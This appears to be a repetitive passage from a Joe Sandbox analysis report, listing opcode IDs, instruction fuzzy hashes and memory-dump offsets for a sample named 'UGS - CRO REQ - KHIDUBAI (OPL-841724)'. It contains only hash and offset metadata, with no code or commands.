                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ce9c8e2e9e0416b27239f9c767a088140042d5e9c99271a5db02b9ca42d4e73
                                                                                                                                                    • Instruction ID: 220c98e73a2cc4c590766567ba55cd9065ce221992cb5bb892849e45065e2eb6
                                                                                                                                                    • Opcode Fuzzy Hash: 9ce9c8e2e9e0416b27239f9c767a088140042d5e9c99271a5db02b9ca42d4e73
                                                                                                                                                    • Instruction Fuzzy Hash: A0E04F361091986FDB02CF94EC91DA97F75EF8A220718808BFC558B262C6729D25DB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
                                                                                                                                                    • Instruction ID: 52175683322837a4e55ce70dd6eb10d6674d6aba93be04665cb4e3c7210fec34
                                                                                                                                                    • Opcode Fuzzy Hash: 62ad5091832ed340f14a6832f9c5fb31005abb07b0e6fa7f0ed9135e301a2b42
                                                                                                                                                    • Instruction Fuzzy Hash: 09E01A35200A00DFC320CA1AD954F53F3EAEFC9B20F59956EE54A87B20DA71F841CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c9cab26e1a450695be0868467f3fee90a3d339aa2524fcf6ec1e0897de24f60
                                                                                                                                                    • Instruction ID: 91ff250283a95306c31d1b330711ba2f3c92cc8640b585d5313e1124b3173cbd
                                                                                                                                                    • Opcode Fuzzy Hash: 9c9cab26e1a450695be0868467f3fee90a3d339aa2524fcf6ec1e0897de24f60
                                                                                                                                                    • Instruction Fuzzy Hash: 72E06DB1E0A450AFD703DA30C901BC977B6EB142C6FF82561821292156F2310C428FC4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c36fea3816fcd436a036e13169980b572448950300c8e80ebd4c719bacd8bb37
                                                                                                                                                    • Instruction ID: 83bd4156e9bbe92dee33e301d60a88263e99394e7ed6b692f2a343d806e31548
                                                                                                                                                    • Opcode Fuzzy Hash: c36fea3816fcd436a036e13169980b572448950300c8e80ebd4c719bacd8bb37
                                                                                                                                                    • Instruction Fuzzy Hash: 1BE0B63104E285CFC7595BB5A9290B4BF71BD6130671D828BE447C5862C73528CAFB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f57e8bfd9ed8b79a90e6edb66416e9caec129a20bc5fe3a9db9f9b6a653b6a8
                                                                                                                                                    • Instruction ID: dd259c0fb2ae73ce9fa64707af37e4085399109273c3ad2ec2eb2b6ff62c1790
                                                                                                                                                    • Opcode Fuzzy Hash: 4f57e8bfd9ed8b79a90e6edb66416e9caec129a20bc5fe3a9db9f9b6a653b6a8
                                                                                                                                                    • Instruction Fuzzy Hash: FEE086323052145FEB055A65C8163F237A69B42711F148263B1518E2DACD2946865771
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8196ebf17976b79b67c801a3112fc5a8404a28e2595eaec615c0310a6234fe29
                                                                                                                                                    • Instruction ID: fa522109402c2003f84e68fb6ce42c743cbcfd9b82927a0fca66e9daf88d6a12
                                                                                                                                                    • Opcode Fuzzy Hash: 8196ebf17976b79b67c801a3112fc5a8404a28e2595eaec615c0310a6234fe29
                                                                                                                                                    • Instruction Fuzzy Hash: 6DE04F3158E3906EC72286601C11FD63F644B12660F1A419BEA45EF692C26598448791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
                                                                                                                                                    • Instruction ID: 2e4c0567fd4032964e8fbf548679c2cafe1a7bee7a939a656baafe6b6ed5dabe
                                                                                                                                                    • Opcode Fuzzy Hash: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
                                                                                                                                                    • Instruction Fuzzy Hash: 0EE0ED39A04619CBDB20DA05D540BBAB7F1FB90310F258097DB59A7710E7389D519F86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 32efcab49229efa625e495e1ef2bbba7152c96d1cb3412967616df7a5a4de928
                                                                                                                                                    • Instruction ID: e0eae075574b62ff6f6b5a68438f7917f4d63db171c7398f17ba1f98b3fae2b0
                                                                                                                                                    • Opcode Fuzzy Hash: 32efcab49229efa625e495e1ef2bbba7152c96d1cb3412967616df7a5a4de928
                                                                                                                                                    • Instruction Fuzzy Hash: B2E08630A0522CDBCB248A14CC157AB7B79EBC6750F11087B951667384DBB51C08EBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d820da00b828c77f43388c91a5544137b87bb1430c3ac0cbd094fd0bd6b66f6b
                                                                                                                                                    • Instruction ID: 743275f79a780d95a1c0ad46b12e9be70e31ef1e308b57c19d7a16c428960d92
                                                                                                                                                    • Opcode Fuzzy Hash: d820da00b828c77f43388c91a5544137b87bb1430c3ac0cbd094fd0bd6b66f6b
                                                                                                                                                    • Instruction Fuzzy Hash: 79D0123124D1805FC305C7A8DC91D657BF59F8B10431884EEE449C76A3D515EC13C620
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 39f5c4a8261fd0ef7de0834794d00e6a74cecc2ed14f5ef49430e5f621b002d1
                                                                                                                                                    • Instruction ID: 124843c08d7499268329b490b7fa37c0400b441b7c796f67d20c3a0a50914bc0
                                                                                                                                                    • Opcode Fuzzy Hash: 39f5c4a8261fd0ef7de0834794d00e6a74cecc2ed14f5ef49430e5f621b002d1
                                                                                                                                                    • Instruction Fuzzy Hash: B6E0C23264C2C08FC302C360D8A25947FA1DA5321030C81EEC088CF292CB22A40ACA11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ca7819e310e75a3c20a2c175768857bfa52c96fdb284f18e9eaee9b431ecdbbd
                                                                                                                                                    • Instruction ID: 34bfd88b83796394928823efed028051bd4056d052a3830a378b8272e4f00f01
                                                                                                                                                    • Opcode Fuzzy Hash: ca7819e310e75a3c20a2c175768857bfa52c96fdb284f18e9eaee9b431ecdbbd
                                                                                                                                                    • Instruction Fuzzy Hash: F8E04F35109290AFC701CB64D8518A5BF74EF8721030CC1CBD8458B253C6719C15CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4af4d59ea1fa63ce4999dd18e730d46a9b00ff3fc0eee2feb2d78878d4f463c6
                                                                                                                                                    • Instruction ID: 90121d5a39c6f1730867d6bb6deff02ea6154f2d24e4691469cb98dc68d81bf8
                                                                                                                                                    • Opcode Fuzzy Hash: 4af4d59ea1fa63ce4999dd18e730d46a9b00ff3fc0eee2feb2d78878d4f463c6
                                                                                                                                                    • Instruction Fuzzy Hash: 50E0123160C5885FC345CBB8D891D55BFB1DF9725031C829ED859CB262EA32E816CB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 10db89b43ca67acf3825c5471f7d81cac5ed160eb250f2de9cf811a1e5caf0ff
                                                                                                                                                    • Instruction ID: 6ff78680100bb46f642325ce99863b5f40cb2788f86183232b79063f5286344d
                                                                                                                                                    • Opcode Fuzzy Hash: 10db89b43ca67acf3825c5471f7d81cac5ed160eb250f2de9cf811a1e5caf0ff
                                                                                                                                                    • Instruction Fuzzy Hash: 72E0C23220E3C06ED30397246C60AB27FB69F97200B0D40CED0C28B196C6215B46DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9654b37766c282164e7142542b889f681f065a517cb30fdce9aca2447c1ea1cf
                                                                                                                                                    • Instruction ID: 625ca6f14819948a4df034ffa9b5102289451def6860149383884c18bfb9d645
                                                                                                                                                    • Opcode Fuzzy Hash: 9654b37766c282164e7142542b889f681f065a517cb30fdce9aca2447c1ea1cf
                                                                                                                                                    • Instruction Fuzzy Hash: D6E0C23120D3C45FC341CA34DC61965BFB08F97214328C0AFD888CB253D622D802C712
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d89b3716c74d9cf0fcb8797a9899749802edf825f69ff9a3321255c9bef20389
                                                                                                                                                    • Instruction ID: 58795aabbd1c9055d21088f5f7f784072169dc554d6f81d34b461ea8574fca87
                                                                                                                                                    • Opcode Fuzzy Hash: d89b3716c74d9cf0fcb8797a9899749802edf825f69ff9a3321255c9bef20389
                                                                                                                                                    • Instruction Fuzzy Hash: 82D05E3508D3C49FC3038BA8E864CC47FB0AE1A22031A42DBE484CB573C2698849CB21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f5135d65850c0ecb2f0c9348c0f5826fbdcea990565f9df1cfec73994495f4d7
                                                                                                                                                    • Instruction ID: fb6e8c5862bbe7674f177f244ee9b2d3119cb169d356fcffdcc5c90e045939d7
                                                                                                                                                    • Opcode Fuzzy Hash: f5135d65850c0ecb2f0c9348c0f5826fbdcea990565f9df1cfec73994495f4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 42D05B31A40F244BD338DB57A40459BB7DB5FC8621F49C53FD40A47A50DF7859858BC4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a3dd0454e047ddc007a395b1df74c6e9649e4b0205208c712bb44f104f56df38
                                                                                                                                                    • Instruction ID: 67a2d2ff66865a7c8960d24266cb9b7842bb14e432d21737e40064fe7d93e274
                                                                                                                                                    • Opcode Fuzzy Hash: a3dd0454e047ddc007a395b1df74c6e9649e4b0205208c712bb44f104f56df38
                                                                                                                                                    • Instruction Fuzzy Hash: 77E0E23524A384AFD3028A68CC16F517F74EF16B00F5900DAE2408F1E3D26AA828CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2650d08365391e9194383ebb33f70006e789dbff80d30b456cffe8cd0b1fa578
                                                                                                                                                    • Instruction ID: 07046f58da405debc9a3125b6eefdb1d5cb5ffc0c430531d33a5418d1f339237
                                                                                                                                                    • Opcode Fuzzy Hash: 2650d08365391e9194383ebb33f70006e789dbff80d30b456cffe8cd0b1fa578
                                                                                                                                                    • Instruction Fuzzy Hash: FED0177424D2846FD306C6689C608A5BFB59EDA210318C19EE849CB653D5229D16C620
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 28c3e658da4aae9e39f3f30aa5c0d79b48b98e4f7d62dee6ebb053f7896d304f
                                                                                                                                                    • Instruction ID: cd64e5b3db6d4dda15c8f8d8ceecd26f8b63dd039b9aa8438ff9199537359309
                                                                                                                                                    • Opcode Fuzzy Hash: 28c3e658da4aae9e39f3f30aa5c0d79b48b98e4f7d62dee6ebb053f7896d304f
                                                                                                                                                    • Instruction Fuzzy Hash: D5D0A7713092145FFB045EB6C8113F631D79F81711F28C23271A28B3D9C92999C763B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8012b9dabde586428f154704a2fd7cdb5aaf92b946ea07d5b62803a2b8d8237c
                                                                                                                                                    • Instruction ID: 60af4499e59234b7360fecfe49f41300d23ec56289ab36d5d936e98909327e1e
                                                                                                                                                    • Opcode Fuzzy Hash: 8012b9dabde586428f154704a2fd7cdb5aaf92b946ea07d5b62803a2b8d8237c
                                                                                                                                                    • Instruction Fuzzy Hash: CBD012771CA3C06FD302CA6099B15C0BFF99E8212431AC8DBD458CB163C65F990BCB15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7c2f29ff207880cc64355d4536e0cbacb8b5a4586625952379d6895b3a3b969f
                                                                                                                                                    • Instruction ID: 4f3968848e30389e0bafcd0da0023943da3f709e8da1aeca4388cf253cb33731
                                                                                                                                                    • Opcode Fuzzy Hash: 7c2f29ff207880cc64355d4536e0cbacb8b5a4586625952379d6895b3a3b969f
                                                                                                                                                    • Instruction Fuzzy Hash: 6AD09E7508D2846FC7028B78E864CD57FB0DE5A23031645D7E585CB573C26A489ACB12
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                                                                                                                                                    • Instruction ID: 665107a6948f13d045154be553eea2f5160f4d4ff38ffed385bfc9f1518a8c60
                                                                                                                                                    • Opcode Fuzzy Hash: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                                                                                                                                                    • Instruction Fuzzy Hash: 3CE0EC39A04619CBCB20EA45D5407BAB7F1FB50360F258097CB45A7600E3389D518B86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 036e6ea297d7c8fc8c6b09d7f22efe5191a702715e244e691fb543930df8a9cf
                                                                                                                                                    • Instruction ID: 1662bee522bd7c2680cb63d39b48510d7d7f5f61d5e4f8c7187f93216f5e20e3
                                                                                                                                                    • Opcode Fuzzy Hash: 036e6ea297d7c8fc8c6b09d7f22efe5191a702715e244e691fb543930df8a9cf
                                                                                                                                                    • Instruction Fuzzy Hash: C6D05E3100C2805FC312CBA8E8A2A967BB89E4721430880DED468CB562CA269807CE20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c9f117d8b36bf302df39f91ceaf5fdce5f7e0f25e7d7c7de09801488c75b54a8
                                                                                                                                                    • Instruction ID: d91a3e9578fcc374070858fbd06ba79da9547b2cfb8ab31d17ab365d2e7f2e30
                                                                                                                                                    • Opcode Fuzzy Hash: c9f117d8b36bf302df39f91ceaf5fdce5f7e0f25e7d7c7de09801488c75b54a8
                                                                                                                                                    • Instruction Fuzzy Hash: 04D05E3650C2C04FC306C7B8E4D19147FB09E4B11831C80EEC05ACF263CA269407CB11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                                                                    • Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
                                                                                                                                                    • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                                                                    • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0363563aa19d633130a3835535bdd8dbe9402f0e4ed07d8d332adb26c21b56be
                                                                                                                                                    • Instruction ID: f9c00ec6d1e5039e071c543747013b9be41756271007b2d68abe3bc501294ddd
                                                                                                                                                    • Opcode Fuzzy Hash: 0363563aa19d633130a3835535bdd8dbe9402f0e4ed07d8d332adb26c21b56be
                                                                                                                                                    • Instruction Fuzzy Hash: 78D05E3200C1804FD342C7A8E8D19647BA4DE4B20430844EED409CB162CA22A40BCB10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ff4776bb994999e9fd3c57d91b9f89e0bd9d1a82a3884650830a1546237c04a7
                                                                                                                                                    • Instruction ID: 496d48bf9a49c8b9b9f2db38efd5c127ae4265b89ec6233f6027c4e3941ab3d3
                                                                                                                                                    • Opcode Fuzzy Hash: ff4776bb994999e9fd3c57d91b9f89e0bd9d1a82a3884650830a1546237c04a7
                                                                                                                                                    • Instruction Fuzzy Hash: 1CD0A932682324A7CA326954AC02F86770C9B22BA0F020022FF046F38086B2B84083D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
